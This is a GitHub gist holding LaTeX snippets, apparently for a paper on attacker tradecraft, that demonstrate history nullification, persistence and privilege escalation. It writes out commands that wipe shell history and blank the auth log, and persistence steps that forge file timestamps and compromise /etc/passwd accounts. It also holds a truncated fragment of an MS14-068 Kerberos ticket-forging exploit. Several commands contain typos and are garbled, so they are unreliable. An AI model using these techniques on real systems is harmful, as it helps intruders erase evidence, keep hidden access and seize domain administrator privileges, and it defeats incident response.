-
-
Save flaing/a643d3029f47679ad63c91e13182371d to your computer and use it in GitHub Desktop.
DEMOs: history nullification, persistence, privilege evasion.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Highly productive APT synthesizes phishing and social engineering practices for persistent purpose\cite{falliere2011w32, cardenas2011attacks, maiorca2019digital, urbina2016limiting}. They usually share similar strategic goals. History cleaning and faking can increase the impact of the goals. | |
An example of common history cleaning: | |
{\footnotesize | |
\begin{verbatim} | |
ln /dev/null -/.bash_history -sf # history to null | |
kill -9 $$ # kill session | |
history -c # clear session history | |
echo "" /var/log/auth.log # clear auth log | |
export HISTFILESIZE=O # length trick for history | |
export HISTSIZE=O # for command | |
unset HISTFILE # disable | |
\end{verbatim} | |
} | |
An example of trickier persistence: | |
{\footnotesize | |
\begin{verbatim} | |
## nologin passwd | |
## put authorizations in man, backup, daemon, bin. | |
## create crontabs for that. | |
SHELLS_TS=$(stat -c '%y' /etc/shells) # shell trick | |
# malicious logics and reset timestamps | |
touch -d "$SHELLS_TS" | |
/lib/modprobe.d/ /media/cdrom1/ | |
/usr/local/lib /etc/tmux.cf | |
/lib/modprobe.d/systemctrl.conf | |
/media/cdrom1/debian.iso | |
/usr/local/lib/python3.9 | |
## now (/etc/passwd)(/usr/sbin/nologin) compromised | |
\end{verbatim} | |
} | |
Other than hardly detected history clearing and persistence, hackers can also bypass intrusion detection and prevention by gaining highest privilege. Even in a cloud environment, hackers could forge ticket to gain session key of domain administrator, such as CVE MS14-068 on Kerberos-based Azure cloud. | |
{\footnotesize | |
\begin{verbatim} | |
def sploit(user_realm, user_name, | |
user_sid,user_key, kdc_a, kdc_b, | |
target_realm, target_service, | |
target_host, output_filename, | |
krbtgt_a_key=None, | |
trust_ab_key=None, | |
target_key=None): | |
.. | |
session_key = | |
(int(as_rep_enc['key']['keytype']), | |
str(as_rep_enc['key']['keyvalue'])) | |
\end{verbatim} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment